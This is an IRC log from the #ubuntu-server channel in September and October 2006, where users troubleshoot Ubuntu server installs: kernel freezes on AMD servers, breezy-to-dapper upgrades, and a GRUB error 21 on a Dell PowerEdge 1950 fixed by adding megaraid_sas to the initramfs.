#ubuntu-server 2006-09-25
<TTT_Travis> Hi, I am using Ubuntu Server, I want to hibernate but it says I don't have the kernel modules needed to do it, is there a way I can just get them easily or use the normal ubuntu kernel
<linnuxxy> i had installed plone using apt-get install plone-site
<linnuxxy> i can reach zope in http://localhost:8081/manage
<linnuxxy> where can i reach plone?
<nictuku> linnuxxy, you will probably find help in #ubuntu, not here
<linnuxxy> ok thnx
<Rie1> hey guys, I bought a 2x dual INTEL 64BIT XEON system for my web-server. What ISO version of ubuntu should I download?
<mark> amd64
<Rie1> mark ok thanks
#ubuntu-server 2006-09-26
<sharms> .
#ubuntu-server 2006-09-27
<AWOSDev> Okay so you guys can't help me with an apache problem?
<AWOSDev> According to ChanServ
<AWOSDev> -ChanServ- [#ubuntu-server]  Ubuntu Server Discussions (development and support)
<AWOSDev> but according to your topic you can't
<AWOSDev> so can you help me?
<AWOSDev> I need php3 4 and 5 all on the same Apache2 server
<AWOSDev> is it possible?
<spike> oh, it eventually became "support" too?
<thefish> ye, maybe best to change the name to #ubuntu-devel then eh?
<thefish> or ubuntu-server-dev
<spike> uhg, another ubuntu-channel? gosh, no please
<spike> we dont get that much traffic to justify splitting ayway imho
<spike> hardly support questions are getting in the way of dev discussions
<sysdoc> ARP spoofing/IP aliasing across the net from 2 different backbones accessing the net from different locations, to establish redundancy for http,qmail functions across an enterprise, is this possible with Ubuntu?
<spike> sysdoc: how's that distro dependant?
<mark> I think you'll have to explain that in more detail
<spike> it's even hardly linux dependant
<sysdoc> Right
<sysdoc> the idea is to have site 1/server 1 fail over to site2/server2
<spike> besides, I guess you meant ARP proxying not arp spoofing
<sharms> sysdoc: yes it is possible.
<sysdoc> yea, I know it is possible,
<sysdoc> Anyone have any documentation/url regarding this issue?
<sysdoc> <searching the wiki
<sharms> sysdoc: you don't have an issue, you have various buzz words without substance
<sysdoc> lol
<sysdoc> sorry I guess I was just thinking out loud, got it handled tho....
<sharms> sysdoc: for starters: "ARP spoofing/IP aliasing across the net from 2 different backbones accessing the net from different locations"  - this statement is ambiguous, and could infer many things, but I suppose you are looking for iptables and ifconfig
<sharms> sysdoc: to establish redundancy you need to define the resources to be used: multiple servers, layer 4 switch, ipvs etc
<sysdoc> Like I said, got it handled.... But thanks...
<knixtech> hello all, does anyone have any info for installing open-xchange on the server?
#ubuntu-server 2006-09-28
<whurley> hi all, we're (the Open Management Consortium) evaluating Ubuntu Server and having some issues installing it on our servers. I thought perhaps someone here could help us out. 
<whurley> the issue: when installing onto boxes supplied to us by Penguin Computing (dual opteron 248s 4GB ram 300GB hd) the amd 64 bit Ubuntu cd boots up fine but freezes right after the "io scheduler cfg registered" and right before where the kernel should be loaded into the ram disk. We're tried several boot options and other tricks and tips but nothing works. Any suggestions? 
<nictuku> hi
<nictuku> I'm building a test platform for nwu using pbuilder.
<nictuku> one of the tasks is to do retake the tests Junichi Uekawa was doing for Debian
<nictuku> so I can check how every package deal with non-interactive installation
<nictuku> maybe I'll be able to build a 'blacklist' of packages that nwu shouldn't touch
<nictuku> question is, is there any kind of batch mass-install test currently in production, maybe internally?
<ajmitch> nictuku: piuparts
<ajmitch> it was designed more for testing installs, compared to pbuilder which was for building
<nictuku> ajmitch, so I lost a couple hours of work to do what piuparts does better :-)
<ajmitch> at least it was hours, not days :)
<ajmitch> iwj *may* have some automated testing stuff done
<ajmitch> which he was going to do with xen, iirc
<nictuku> thanks, I'll investigate
<dura> can i use a breezy package on dapper by chance?
<dura> wana try midgard cms
<\sh> hi guys
<\sh> hmm...splash enabled kernels (from dapper) are not working with the ilo software of HP BLade bl35p
<infinity> Err, you're not actually trying to boot with a splash over ilo?
<maswan> \sh: even when booting nosplash (or whatever it is called)?
<maswan> and isnt the server kernel nonsplashy by default even?
<\sh> maswan: no...without the splash setting it works perfectly
<\sh> maswan: no...and that's somehow strange
<infinity> THe server kernel can do splash just as well as any, but the server install doesn't install usplash (hence you'd never get a splash)
<\sh> infinity: then something is wrong with my 6.06 server cd
<infinity> Oh, but there may well be a bug in initramfs-tools where it'll load vga16fb for your console if "splash" is on the command line, even if there's no usplash.
<infinity> ISTR that was a "too late to fix" issue that we left alone.
<\sh> I just did an dist-upgrade for all sec updates and it installs the 2.6.25-27 kernel with the splash option
<infinity> Just whack "splash" out of your grub config and you'll be forever happy.
<\sh> what about new kernels to come? the grub config is added from the kernel package, or am I wrong?
<infinity> It's not so much a bug as a misfeature.  Nothing wrong with having a framebuffer console by default.. Except that ILO hates it.
<infinity> \sh: Change #def
<\sh> grmpf...got the setting for update-grub
<infinity> Err.
<infinity> Change "# defoptions" in menu.lst, then run update-grub.
<\sh> jepp
<\sh> infinity: btw, do you know anyone who installed an oracle 10g on dapper?
<infinity> Not off hand, no.
<fabbione> \sh: somebody installed the express version available as .deb from oracle.com
<fabbione> but i don't know about the full version
<\sh> fabbione: that's my question...I'm planning a switch of distros here at combots from sles9 to ubuntu dapper...the only problem I have right now is to convience the management, that we also can use ubuntu dapper server 6.06 tls as oracle server ,-)
<fabbione> \sh: now i have a question for you... given that i told you that there is a .deb from oracle for oracle DB (in a ligher version of the full one) and that we do officially support OCFS2.. what's the answer to your question?
<\sh> fabbione: the answer is yes, but my problem is "Official Oracle Certificaton for Ubuntu Dapper", management shit 
<fabbione> no Oracle doesn't support Ubuntu yet
<J_P> hi all
<whurley> Has anyone here ever looked at/used openQRM (http://openQRM.org) 
<whurley> I;m the project lead and I'd like to ind a way to get it integrated with the server build since the software is production quality and has a ton of automation features that I think would be useful to people deploying Ubuntu server in their data centers 
* pygi looks
<whurley> I'm trying to work on testing it myself here at the OMC (open management consortium) however, I still can't get Ubuntu server installed on the boxes we have (frustrating) 
<lionelp> whurley: the topic has come into discussion somes times here, but I am not aware of any effort for packaging it
<lionelp> whurley: as you (may or may not) know, today is a freeze day for Ubuntu (freeze for next release in october)
<whurley> well, I would be more than happy to start a systems mgmt team to take it, and other projects within the OMC and pkg them up 
<lionelp> so now, integrating new software will be for Edgy+1
<whurley> lionelp: I wasn't aware, sorry I'm fairly new to Ubuntu in general 
<lionelp> do not be sorry: you're welcome !
<whurley> lol
<whurley> thanks
<whurley> well, setting a solid plan to integrate with Edgy+1 is no issue 
<whurley> the software is pretty popular and there's a good community around it 
<whurley> what are the milestones/dates around Edgy+1? 
<lionelp> it is not planed yet
<whurley> so perfect timing huh? :)
<lionelp> edgy+1 will be released in april 2007, that all what we know :)
<whurley> well, I'll see what I can pull together, perhaps finding a few people in the community to release a .deb (or whatever is required) would be a good first step 
<lionelp> (a release every six moth)
<lionelp> whurley: do you have some sort of package or not yet ?
<whurley> so can you help me with my installation issue here? Or should I go to a different channel (none have been too helpful so far) 
<lionelp> whurley: this is not a support channel, but when the question is server related, it can be answered here :)
<whurley> lionelp: we've had community contributors create a few .debs however they haven't been through nay testing
<whurley> Cool! 
<lionelp> whurley: were are the deb ?
* lionelp wants to test :)
<whurley> lionelp: Here is the issue I'm having trouble with. When installing onto boxes supplied to us by Penguin Computing (dual opteron 248s 4GB ram 300GB hd) the amd 64 bit Ubuntu cd boots up fine but freezes right after the "io scheduler cfg registered" and right before where the kernel should be loaded into the ram disk. We're tried several boot options and other tricks and tips but nothing works. Any suggestions?
<whurley> lionelp: I tried several different boot options, and everything I could find in the forums but I have to think there's something simple that can help me get this installed. The OMC (http://openmanagement.org) is building a new data center and we'd like to std. on Ubuntu server...if I can get us past step #1 :) 
<lionelp> whurley: which cd are you using ? Dapper server CD ?
<whurley> lionelp: ubuntu-6.06.1-server-amd64.iso  
<whurley> lionelp: it boots fine, the memory test, etc work however I have that freeze wen trying to install 
<whurley> lionelp: just a note, the result is the same across all of the boxes and we re-burned the CD to make sure there wasn't any corruption issues
<lionelp> OKay
<whurley> lionelp: I'm at my wits end because I'm not sure what I can change that will get us up and running and we'd like to announce what server we've selected at ApacheCon here in Austin on the 9th
<lionelp> Could you post a bug on malone ? You will have the good intrelocutors.
<lionelp> I am not strong enough
<whurley> lionelp: no worries no one has been so far :)
<whurley> lionelp: we have several people here looking at it and Canonical, AMD and Penguin are trying to help with the issue...just no one has so far ;)
#ubuntu-server 2006-09-29
<whurley> is there an easy way to update ubuntu-server 5.10 to the latest version? 
<whurley> (sorry new to server) 
<infinity> sed -i -e "s/breezy/dapper/" /etc/apt/sources.list && apt-get update && apt-get dist-upgrade
<whurley> thanks so much 
<whurley> I'm still fighting the amd dual proc dapper issues 
<whurley> but wanting to install the previous version (if that works) and then upgrade to see if that's a work around 
<infinity> "the amd dual proc dapper issue"?
<whurley> we're testing Dapper as the "os of choice" for the Open Management Consortium 
<whurley> however, we've been running into an issue that looks like this 
<whurley> the install cd (amd64 version) boots fine and displays the install choices. However, when you select any install option, with any boot options that have been suggested (and there have been many) then it freezes right after "io scheduler cfg registered" and right before where the kernel gets loaded into the ram disk 
<whurley> the servers we're deploying look like this:
<infinity> Curious.  And I assume there's a bug filed about this?
<whurley> Penguin Computing Altus 1300s Dual AMD 248s with Northbridge, 4GB ram and 300GB drives 
<whurley> well, no not that I found 
<whurley> I also thought it coule be us 
<whurley> :)
<whurley> I personally wonder it is something with the mem controller 
<infinity> Well, it could be, but if it's us, it would be nice for you to file a bug and work on resolving it, rather than just assuming it'll stay broken. :)
<whurley> since it dies right as the ramdisk is starting 
<whurley> oh 
<whurley> don't worry 
<whurley> I would have already dumped this distro 2 days ago under normal circumstances 
<whurley> I have been documenting everything tried 
<whurley> and we're systematically trying to find the cause :)
<whurley> we want to start a systems management team 
<infinity> Anyhow, the next thing after registering the I/O schedulers appears ot be ACPI probes.
<infinity> So, if I had to take a short in the dark, I'd guess some IOAPIC/ACPI mangling, either on the kernel command line or in the BIOS, will probably clear you up.
<whurley> so that the OMC can build on top of the OEM version of ubuntu server and create a systems mgmt stack 
<whurley> :)
<whurley> nope
<infinity> But talking to BenC (in a bug report, ideally, or in #ubuntu-kernel) will get you further than talking to me.
<whurley> we tried...
<whurley> noapic nolapic apci=off
<whurley> and the google of other options :)
<whurley> lol
<whurley> I'll see if Ben is online 
<whurley> Infinity, one more question 
<whurley> actually, never mind
* infinity never minds.
<gururug> how about including some scripts that setup systems with packages for certain server roles, i.e. lamp, samba member server etc.
<ajmitch> yes, that's being done
<gururug> sweet
<infinity> Except not with scripts.
<infinity> You can choose a LAMP install from the installer.
<infinity> Or later with tasksel.
<gururug> ahh..
<gururug> what's the recommended deployment method for ubuntu in the enterprise, http?
<gururug> is there an easy way to get a udpcast gui installed with apt / dpkg?
<gururug> sorry, what i really mean is, distro-specific, gui service configuration tools will attract users to ubuntu.
<porkpie1> Hi guy's just trying to install the latest ubuntu server amd64 on a Dell power edge 1950 but it doesn't see the Dual Embedded Broadcom NetXtreme II 5708 Gigabit Ethernet NIC
<porkpie1> This has 2 dual core 3.0ghz in it as well ...am I using the correct server image ?
<porkpie1> We want to run xen on it ...:)
<whurley> porkpie1: out of curiosity did you have an issues with the install? 
<Ries> hey porkpie1
<porkpie1> no didn't finish
<lionelp> porkpie1: it was with a dapper CD or an Edgy ?
<whurley> porkpie1: sorry i meant installing ubuntu-server :)
<Ries> lionelp: whurley: We used the unbuntu serve 6 AMD 64 bit version
<Ries> going to post 3 lines 
<Ries> # lspci | grep -i broad
<Ries> PCI bridge: Broadcom: Unknown device 0103 (rev c2)
<Ries> Ethernet controller: Broadcom Corporation: Unknown device 164c (rev 11)
<Ries> That is what we currently get
<lionelp> Ries: it would be interesting to test with a live Edgy CD to know if the issue is still present
<lionelp> it seems that there are some issues with the latest x950 Dell servers :-(
<Ries> lionelp: we have indeed the latest version of dell server
<porkpie1> Dual Embedded Broadcom NetXtreme II 5708 Gigabit Ethernet NIC
<whurley> Ries: and there were no install issues? I'm having a freeze right after "io scheduler cfg registered" and right before the ramdisk loads. I've tried boot options, etc. but have found nothing that will get me past that point. So you use the Northbrige in your server? Perhaps there are some bios settings that should be adjusted. All I know is that I'm starting to get desperate for help :)
<lionelp> whurley: did you open a bug ?
<whurley> documenting for that now...where should it be posted? 
<Ries> whurley: We have yet ti finnish the install... We will do that first without the nic and then we will see what happens
<whurley> Ries: thanks. I'll be interested to see. Meantime I'll open a big (though I'm not sure what to open it against) 
<Ries> Ok...
<lionelp> whurley: https://launchpad.net/distros/ubuntu/+source/linux-source-2.6.15/+bugs
<whurley> lionelp: thanks
<Ries> Mark ( porkpie1 ) I am heaving lunche with karina... I'll be back in 30 minutes
<Ries> whurley: we will be right back
<whurley> Ries: thanks
<whurley> Bug #63028: Ubuntu-server Installation freezes on AMD Dual Proc server
<whurley> has been opened 
<lionelp> whurley: nice
<lionelp> the apropriate person will contact you for getting more information and try to resolve with you the bug
<Overand> worked fine on my X2 server- but that was amd-64 install
<Overand> ah, just read the scrollback.
#ubuntu-server 2006-09-30
<Jacob_> Hi... I'm looking for some help on a raid-1... After install the disk resync, but I'm unable to boot from one of the disks (the other one disconnected) - anyone seen this problem before ?
<refnumzx> i am having problems, the installer locks up after detecting disk and all other hardware on an hp ml350 g4 ideas?
<refnumzx> saw the topic, sorry
<whurley> question: when the ubuntu server amd 64 cd boots, what options are inserted? 
<whurley> i.e. when I go to run the install I'm suspicious that the options are different and would like to try to set all of the options the same since the cd boots, but the installer won't 
<whurley> lionlp: you around? 
<lionelp> whurley: yes
<whurley> lionlp: I was able to locate a cd of ubuntu 5.10 which boots and is seemingly installing on the server I mentioned. That said, what's the easiest way to update everything to dapper from the cmd line? 
<infinity> sed -i -e "s/breezy/dapper/" /etc/apt/sources.list && apt-get update && apt-get --purge dist-upgrade
<infinity> whurley: ^^^
<whurley> lionlp: thanks, hopefully this will work. If it does I'll make a note in the bug
<lionelp> whurley: infinity answered, not me :) (so thanks him, not me !)
<whurley> Infinity: sorry, actually not looking at the screen and low on sleep 
<whurley> Thanks to all (especially you infinity) 
<whurley> Infinity: sorry to bug you but when I ran that I got a ton of errors like "Failed to fetch CDROM" and " Couldn't stat package list" 
<whurley> Infinity: any clues? 
<lionelp> whurley comment the first line of /etc/apt/sources.list
<lionelp> it references CD-ROM
<whurley> ah
<whurley> lionelp: thanks, that seems to be working. I'm not sure why I have to be going through all of this on these machines, but we'll see what happens after the upgrade goes :)
<whurley> I'll give it this lionelp, these penguin boxes are blazingly fast. Hopefully once this is all working we can start build the mgmt stack for edgy at the OMC :)
<whurley> well, it's a kernel issue 
<whurley> the update ran fine, but the when the system rebooted, it has the same issues as previously mentioned :(
<lionelp> whurley: it works with breezy but not with dapper ?
<whurley> lionelp: yep 
<lionelp> did you tried with edgy ?
<whurley> lionelp: yep, but at least now I can narrow down the issue to the kernel 
<whurley> lionelp: i.e. going into the grub menu 
<whurley> lionelp: I selected 2.6.12.9-386 instead of the default 2.6.15.27-386 
<whurley> lionelp: it booted to the prompt 
<whurley> lionelp: so I assume that at this point at least it is narrowed down to being a kernel issue. Thoughts? 
<lionelp> probabily :)
#ubuntu-server 2006-10-01
<whurley> lionelp: yt? 
<infinity> whurley: Didn't you say these machines were amd64 boxes?
<infinity> whurley: If so, why are you running the i386 build, and the 386 kernels?
<whurley> yes, they're amd boxes 
<infinity> whurley: If you need the i386 build, at least consider installing "linux-k7" or "linux-686" on those boxes.
<whurley> the amd64 stuff will not work on them...which is weird 
<infinity> If you don't actually need a 32-bit system at all, you should be installing our amd64 build.
<whurley> well, this is the goal. however no one has been able to get the AMD64 dapper or edgy running on these boxes 
<infinity> Oh, neither the amd64 kernels NOR the 386 kernels work?  Cool.
<whurley> sadly 
<infinity> Definitely time to be filing bugs and spending more time trying to trace this with people like Ben.
<whurley> do you think you could help me get them running. I've tried all of the boot options, etc. 
<whurley> however, the only way to get dapper was to install 5.0 386 and then update 
<infinity> I'm not an ACPI guru, so there's not much advice I can give you.
<whurley> yeah the ACPI on/off/etc none of that has any effect sadly 
<infinity> Well, it could just be a generic PCI bus-scanning issue, not ACPI-related per se.
<infinity> You could try with "pci=biosirq", perhaps.
<infinity> And/or pci=noacpi
<whurley> will do 
<whurley> I'll try them now
<whurley> brb 
<whurley> infinity: sadly, those produced the same results 
<whurley> infinity: surely someone knows how to make this work 
<MaD_MaX> Hi all.
<MaD_MaX> Is there any one who can answer my q>
<MaD_MaX> ?
* MaD_MaX Hello!
<bcarlson> anyone in here?
<porkpie> hi can anyone here point me to a doc that tells me how to build ubuntu server with xfs instead of ext3
<porkpie> guy is it possible to build ubuntu server with xfs from the install or do you have to change it afterwards ...I am struggling here to find an option when installing.  All I only need an 8GB partition but I can't do that either  ...ver 6.0.1 ..alternative CD
<porkpie> guys is it possible to build ubuntu server with xfs from the install or do you have to change it afterwards ...I am struggling here to find an option when installing.  All I only need an 8GB partition but I can't do that either  ...ver 6.0.1 ..alternative CD
<infinity> The partitioner lets you select the filesystem types.
<porkpie> infinity:I can't seem to find these options ...I am new to ubuntu ...normally I use freebsd.   I am building a xen server.  We are using a new Dell 1950 with 2 dual core 3.0ghz,  I am also running hardware raid one.  Just tried a basic install and it faild with an grub error 21??
<porkpie> infinity:is there a doc on how to use the partition tool ..... this is my Device to partition that has been detected /dev/sda: scsi1 (0,0,0) sda -146GB /dev/sdb: scsi1 (0,1,0) (sdb) -146GB /dev/sdc: scsi1 (2,0,0) (sdc) -146 GB   sdc is the raid1 logical drive the other 2 are the phyical drives ....I am not sure where I should install ubuntu on to ...
<porkpie> infinity:I have found the options 
<porkpie> Anyone here have any ideas why a Dell power edge 1950 will not reboot when the terminal signal is sent ??
<porkpie> infinity:how do you just install the base OS ....it's installing at the moment but it seems to be install all of the packages ??
<infinity> Define "all of the packages"... The server install is pretty minimal.
<porkpie> infinity:I think the count was about 800
<infinity> Are you using the server CD?
<infinity> You're not, are you?  You're installing from the Alternate CD, which is installing a complete desktop system.
<infinity> You can boot the alternate CD with a "server" command line option, which will do more-or-less the same thing as the server CD (except won't install a server kernel out of the box)
<porkpie> infinity:Yeah ...shit ....I will rebuild it once it has finished with the server cd not the alternative ...I was advised to use the alternative cd but the ubuntu channel :(
<porkpie> Also these a 64bit cpu's is it correct to use the 64amd server cd ..they a xeon processors
<porkpie> The system hangs when I do a ctrl alt delete ....just sits there saying please stand by while rebooting the system ???
<infinity> Our amd64 stuff does support Xeon boxes, sure, though P4-based Xeons aren't stellar performers in 64-bit, so you may want to try the i386 build.  Up to you, though.
<porkpie> infinity:these are dual core's   we want to use the VT technology 
<porkpie> infinity:2 of these Dual Core Intel Xeon 5150, 4MB Cache, 2.66GHz, 1333MHz FSB
<porkpie> infinity:would this be the same for the latest iso ? Alt+F2
<porkpie> chroot /target
<porkpie> echo "megaraid_sas" >> /etc/mkinitramfs/modules
<porkpie> mkinitramfs -o /boot/initrd.img-2.6.15-23-server 2.6.15-23-server
<porkpie> exit
<porkpie> Alt+F1
<porkpie> infinity:the initrd.img name ?
<infinity> Looks fine to me...
<infinity> Though if you already have an initrd, "update-initramfs -k 2.6.15-23-server" is a slightly friendlier way to make sure it's all done right.
<infinity> (And you should already have one if the kernel got installed correctly)
<porkpie> OK ...I am having to reinstall again ...so do I just run the command you have posted ?
<infinity> Well, after adding megaraid_sas to /etc/mkinitramfs/modules, yeah.
<porkpie> cool thanks
<porkpie> I take it I don't use the ""
<infinity> Yeah.
<porkpie> infinity:the initrd.img name will be the same for a amd64 iso ....I am not using the i386 iso
<porkpie> infinity:this may sound a bit stupid ...but when setting up the partitions do I need to flag one as bootable or will the install do it it's self ?
<infinity> The installer won't mark one bootable if you're doing manual partitioning, no.  Do it yourself.
<porkpie> thats what I thought ....it is only installing lilo not grub ?
<infinity> ?
<infinity> The installer will install grub by default, and unless you have a good reason to not want it, I suggest you let it.
<porkpie> shit ....I am going mad here ....sorry
<porkpie> infinity:I get the error cannot find  /lib/modules/2.6.15-23-server
<porkpie> ah ..it should be amd64
<porkpie> infinity:the update command doesn't like the -k
<porkpie> I have to specify either -c -u or -d ??
<porkpie> -u
<infinity> Oh, yeah.  Sorry.
<infinity> update-initramfs -u -k (versoin)
<porkpie> it should -u
<porkpie> OK ....lets see if it works :)
<porkpie> eek ... well I think it's broke ... L 010101010101010101010010101010100101 all over the screen ???
<porkpie> infinity:any ideas ??
<porkpie> do you think it's the amd kernel 
<infinity> Erm, I think you used LILO.
<infinity> Re-run lilo after you've updated your initramfs.
<infinity> Otherwise, it can't find it.  Cause LILO's retarded.
<infinity> What was your reson for not using grub? :)
<porkpie> None ....it just doesn't install
<porkpie> I don't see it installing ....I only get a lilo option 
<infinity> Oh, grub might not support /boot on XFS, so the installer might be trying to be smart and picks lilo for you.
<porkpie> ah ....so xfs is the problem 
<infinity> So, I guess you could either suffer with lilo (and remember to re-run it after every initramfs update), or repartition with a small (100 MB or so) ext3 /boot
<porkpie> So run /boot on ext3 and the os on xfs
<porkpie> I will then get the xfs speeds 
<infinity> That's the theory, yeah.
<porkpie> Cool  ...I will try it now
<porkpie> will boot be primary or logical ...
<porkpie> fuck my brain will not work today 
<infinity> Best to make it a primary partition at the beggining of the drive.
<infinity> Then whatever you want for the rest.
<porkpie> it's going for it  :)
<porkpie> infinity:just rebooting  .....lets see what happens now ...grub installed OK this time
<porkpie> Dam GRUB Loading, please wait error 21 :(
<porkpie> infinity: do you have any ideas on this one ....it looks like grub has a problem with the block size or it can't find the drive
<Jacob_> Hi - I've got a quick question about partitioning. Google didn't seem to have an answer, so I'm trying here ;o) Why is 5% reserved for the super user when you create a partition ? If you have a partition of 200G you lose 10G!! :o(
<infinity> You can change that with tune2fs.
<Jacob_> Cool... But what's the point of the reserved blocks ?
<Jacob_> What are they used for ?
<porkpie> infinity:any ideas on the grub error 21
<porkpie> infinity:I am going nuts here ....I can't workout what is wrong
<porkpie> shall I create 1 4GB partition for the unbuntu and then install LVM on the free space and then xfs 
<Jacob_> Nevermind... I found the answer. On data partitions the five percent is lost space ;o)
<infinity> porkpie: Error 21 means it's mapping the disks wrong.  Disagreeing with the BIOS about what order your disks come in.
<porkpie> infinity:the error 21 ... I am running hardware raid 1 ..so I am not sure why grub is getting confiused
<stephans> hello?
<JB[away] > hi
<porkpie> join grub
<ivoks> ummm...
<ivoks> am i missing something, or we don't compile portmap with tcp_wrappers
<porkpie> ivoks:do you know if ubuntu 6.0.6 LTS amd64 has the correct driver for the PERC 5/i This is a rebranded LSI Logic MegaRAID card, megaraid_sas driver ?
<ivoks> define correct driver?
<ivoks> it does have megaraid driver
<ivoks> it does have megaraid_sas too
<porkpie> we I am trying to install 6.06 amd64 distro on a Dell Power edge 1950 but it keeps failing with grub is loading please wait Error 21
<ivoks> (fwiw; i am missing something; we do compile it)
<ivoks> porkpie: hm
<porkpie> Hmm! ...I have tried to build this thing 15 times
<ivoks> porkpie: it has intel xeon proc, doesn't it?
<porkpie> yep dual core 
<ivoks> so, you installed it but can start it?
<porkpie> xeon dual core with VT we want to use it for xen 
<ivoks> s/can/can't
<porkpie> Corret
<porkpie> correct
<porkpie> ivoks:if you could help .....I would much appreciate it ....I will buy you a few beers :)
<ivoks> so, kernel boots and fails or grub fails?
<porkpie> Yep ....I have tried to load the driver into the initramfs but that still fails
<ivoks> so kernel fails? :)
<porkpie> Seems that way
<ivoks> ok, let me see
<porkpie> I have tried this echo "megaraid_sas" >> /etc/mkinitramfs/modules
<porkpie> update-initramfs -u
<ivoks> well, this is the thing
<ivoks> megaraid_sas isn't included in kernel
<ivoks> errr... initrd
<ivoks> you should boot rescue option
<ivoks> from install CD
<porkpie> OK ...I can try that now
<ivoks> you need ubuntu-server install cd
<porkpie> I have it here
<ivoks> boot from it and choose rescue option
<porkpie> OK doing it now
<porkpie> OK   ...done that ...I am at the  language option screen
<ivoks> just go all the way...
<porkpie> OK ...I am at entre rescue mode
<porkpie> device to use as root file system
<porkpie> ?
<ivoks> well, choose the one which you have formated as /
<porkpie> I have 13 options 
<porkpie> shit  ..
<ivoks> 13?
<ivoks> you have 13 partitions on your disk?
<porkpie> no only 3
<ivoks> so, what are the options? sda1, sda2, sda3...?
<porkpie> '/dev/discs/disc0/part6'
<ivoks> ah...
<ivoks> by the way, if you enter 'dell power edge 1950' in google, the very first link ofers a solution
<porkpie> I have a /dev/vg1/lv1  which is the LVM I setup
<ivoks> well, choose the one you formated as '/'... i can't tell which one is that, you should know that
<porkpie> it's not there
<porkpie> ??
* porkpie is going of his head
<ivoks> you did a lvm install?
<porkpie> Yep
<ivoks> i've never tested rescue mode with lvm :/
<porkpie> Do you think it installed correctly 
<ivoks> would it be a trouble to install it again?
<ivoks> since we don't know what's /  :)
<porkpie> No problem
<ivoks> porkpie: http://www.ubuntuforums.org/showpost.php?p=1329855&postcount=9
<ivoks> open that page
<ivoks> that's a solution
<porkpie> ivoks:I have done this 
<ivoks> i doubt that
<porkpie> we have tried this 5 times
<ivoks> you probablly didn't do it correctly
<ivoks> mkinitramfs -o /boot/initrd.img-2.6.15-23-server 2.6.15-23-server
<ivoks> will solve the problem
<ivoks> with echoing megaraid_sas in /etc/mkinitramfs/modules, before that
<ivoks> oh, wait...
<ivoks> you have 6.06.1?
<ivoks> if you have 6.06.1, then it's:
<ivoks> mkinitramfs -o /boot/initrd.img-2.6.15-24-server 2.6.15-24-server
<porkpie> hmm! I am using the amd64
<ivoks> then it's:
<porkpie> it uses 2.6.15-26-amd64-server
<ivoks> mkinitramfs -o /boot/initrd.img-2.6.15-26-amd64-server 2.6.15-26-amd64-server
<porkpie> ivoks:beleive me I have done this 5 times
<ivoks> edit grub entry and remove splash and quiet, and boot it
<ivoks> you can do that from grub, you don't have to rescue the system
<porkpie> ivoks:can I do this from rescue mode ?
<ivoks> just remove CD, boot your computer, press Esc when grub tells you to do that
<ivoks> then highlight your kernel on the list and press e
<ivoks> move to line 'kernel /boot/vmlinuz....' press e again
<ivoks> delete splash and quiet, press enter and then b
<porkpie> OK just booting
<porkpie> All I get is Grub loading stage1.5 then it fails with GRUB Loading, please wait Error 21:(
<porkpie> I don't get to esc
<porkpie> I not seeing the drive
<ivoks> ok...
<ivoks> you created lvm partitions?
* porkpie is going to put the server in the bin 
<ivoks> did you create non-lvm /boot partition?
<ivoks> grub can't boot from lvm
<porkpie> yes
<porkpie> I am going to rebuild without LVM and see if it works
<ivoks> how big is that raid?
<ivoks> is it over 2TB?
<porkpie> 146GB
<porkpie> no
<ivoks> hm...
<porkpie> Not aTB
<porkpie> maybe I have created the LVM wrong
<ivoks> if you are doing reinstall
<porkpie> I am now
<ivoks> be sure to delete LVM volumes and groups before you delete partitions
<porkpie> OK
<ivoks> so, when partitioner starts, go directly to lvm managment and delete volumes first, then groups
<porkpie> OK that done ...I now have 146.2GB free
<porkpie> I am going to create a / partion and swap partition   
<ivoks> create one simple / partition and swap just for testing
<porkpie> OK ...that done
<porkpie> just setting clock :)
<porkpie> installing base system
<ivoks> after the base system is installed, press alt+f2
<ivoks> and chroot /target
<ivoks> well, you know the drill :)
<porkpie> should it be chroot /target/
<porkpie> it fails if you do chroot /target
<ivoks> is instalation finished?
<porkpie> just finidhing
<porkpie> finishing
<porkpie> configuring evms
<ivoks> wait for it to unload CD
<porkpie> OK I am in the console
<ivoks> chroot /target
<ivoks> echo "megaraid_sas" >> /etc/mkinitramfs/modules
<ivoks> check it (cat /etc/mkinitramfs/modules)
<porkpie> it's there
<JB[away] > have anyone packages for apache2.2 ?
<ivoks> mkinitramfs -o /boot/initrd.img-`uname -r` `uname -r`
<porkpie> do I need the `
<ivoks> yes
<porkpie> OK cannot find  /lib/modules/2.6.15-26-amd64-generic
<ivoks> so, what is there in /lib/modules?
<ivoks> errr....
<ivoks> generic
<ivoks> it should've been -server
<porkpie> '/lib/modules/2.6.15-26-amd64-server
<porkpie> yeah
<ivoks> ok, my bad
<ivoks> mkinitramfs -o /boot/initrd.img-2.6.15-26-amd64-server 2.6.15-26-amd64-server
<porkpie> OK thts done
<porkpie> now exit
<ivoks> check it
<porkpie> how do I checl it
<porkpie> check it ?
<ivoks> exit the chroot
<porkpie> exit
<ivoks> or, even better
<ivoks> stay in chroot
<ivoks> co, chroot /target
<ivoks> cd /tmp
<ivoks> mkdir temp
<ivoks> cd temp
<ivoks> cp /boot/initrd.img-2.6.15-26-amd64-server initrd.gz
<ivoks> gunzip initrd.gz
<ivoks> cpio -i < initrd
<ivoks> ls -dl lib/modules/2.6.15-26-amd64-server/kernel/drivers/scsi/megaraid/megaraid_sas.ko
<ivoks> is it there?
<porkpie> no such file or dir 
<porkpie> I am check the syntax
<ivoks> is there
<ivoks> ls -dl lib/modules/2.6.15-26-amd64-server/kernel/drivers/scsi/megaraid ?
<porkpie> yep
<ivoks> cd into it
<ivoks> no megaraid_sas in it?
<porkpie> it's there
<ivoks> ok then
<ivoks> exit
<ivoks> umount /target
<ivoks> finish installation
<ivoks> that is, reboot
<porkpie> let see ...it rebooting
<porkpie> same error
<ivoks> hm
<ivoks> except disks connected to raid, do you have any other disk in that computer?
<porkpie> no
<ivoks> error 21?
<porkpie> yep
<ivoks> This error is returned if the device part of a device- or full file name refers to a disk or BIOS device that is not present or not recognized by the BIOS in the system.
<porkpie> I have been going round in circles  ....
<ivoks> you can allways try with lilo
<porkpie> ivoks:but xen requires grub
<ivoks> ah... right
<ivoks> http://linuxfromscratch.org/pipermail/lfs-support/2005-March/026477.html
<porkpie> eh! 
<porkpie> Hmm! how can that be
<porkpie> the grub install did not ask for the MBR
<ivoks> it allways install in mbr
<ivoks> that's irrelevant
<ivoks> check your bios settings
<porkpie> check now
<ivoks> check with raid controller if it has some 'bootable' option for disks
<porkpie> hmm! embedded SATA is off ...not sure about that
<ivoks> well, you are not using embedded sata
<porkpie> I have nothing else in the bios
<ivoks> http://lists.gnu.org/archive/html/bug-grub/2003-02/msg00082.html
<ivoks> boot a rescue again
<porkpie> OK
<ivoks> what filesystem is /?
<porkpie> ext3
<porkpie> Something strange here ....I have the /dev/discs/disco0/part1 again ...only 6 this time ???
